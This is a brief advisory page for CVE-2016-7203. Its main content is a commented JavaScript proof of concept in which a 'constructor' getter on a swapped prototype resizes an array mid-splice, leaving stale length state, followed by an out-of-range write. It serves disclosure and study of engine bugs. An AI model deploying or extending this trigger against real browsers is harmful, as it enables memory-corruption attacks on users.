CVE-2016-7203

  • Report: Sep 2016
  • Fix: Nov 2016
  • Credit: Natalie Silvanovich, Google Project Zero

PoC

// PoC for CVE-2016-7203 (see page header for report/fix dates and credit).
//
// Bug class: re-entrancy through a user-controlled getter. `Array.prototype.splice`
// looks up `constructor` on its receiver (the ES ArraySpeciesCreate step) while it is
// part-way through the operation. Here that lookup is routed to a getter that resizes
// and refills the very array being spliced, so any length/capacity the built-in cached
// before the lookup is stale afterwards. The defensive rule this illustrates: a built-in
// must re-validate array length (and every other cached invariant) after any step that
// can run script — getters, species lookups, valueOf/toString, proxies.
//
// `a` starts as a sparse array: length 200000, with only [10000, 10200) populated.
var a = [];

// Returned from the `constructor` getter below. An empty class has no
// Symbol.species, so the species lookup presumably falls back to a plain
// array — TODO confirm against the engine under test.
class dummy{}

a.length = 200000;
a.fill(7, 10000, 10200);

// `o` will become a's prototype; its only purpose is to host the getter.
var o = {};

// Accessor for `constructor`. It fires when a built-in reads `a.constructor`
// (a has no own `constructor`, so the lookup reaches `o`). Side effects on `a`:
//   1. length grows to 0xfffffffe (one below the 2^32-1 maximum),
//   2. the tail [0xfffff000, 0xfffffffe) is filled with a double (7.7),
// then the lookup is satisfied with `dummy`.
Object.defineProperty(o, 'constructor', {
    get: function() {
      a.length = 0xfffffffe;
      var k = [];
      // Borrow fill via .call so the mutation is done by the generic built-in.
      k.fill.call(a, 7.7, 0xfffff000, 0xfffffffe);
      return dummy;
    }
  });

// Swap a's prototype chain so `constructor` resolves to the getter above
// instead of Array.prototype.constructor.
a.__proto__ = o;

// 500 doubles to insert at index 0; 500 is also the gap chosen at line
// `a.length = 0xfffffffe - 500` so the post-splice length lands on 0xfffffffe.
var q = [];
q.length = 500;
q.fill(7.7);

// Borrowed only to call Array.prototype.splice generically on `a`.
var j = [];

// Pre-size `a` so that inserting 500 items brings the length to exactly
// 0xfffffffe, i.e. the same length the getter sets mid-operation.
a.length = 0xfffffffe - 500;

// Insert q at index 0 with deleteCount 0. During this call the engine reads
// a.constructor, the getter above runs, and `a` is resized/refilled underneath
// the in-progress splice.
j.splice.call(a, 0, ...q);
// Write into the region the getter filled (0xfffff1eb lies in [0xfffff000, 0xfffffffe)).
// Presumably exercises the now-inconsistent length/storage state — the exact
// failure mode is not shown on this page.
a[0xfffff1ec - 1] = 10;

Reference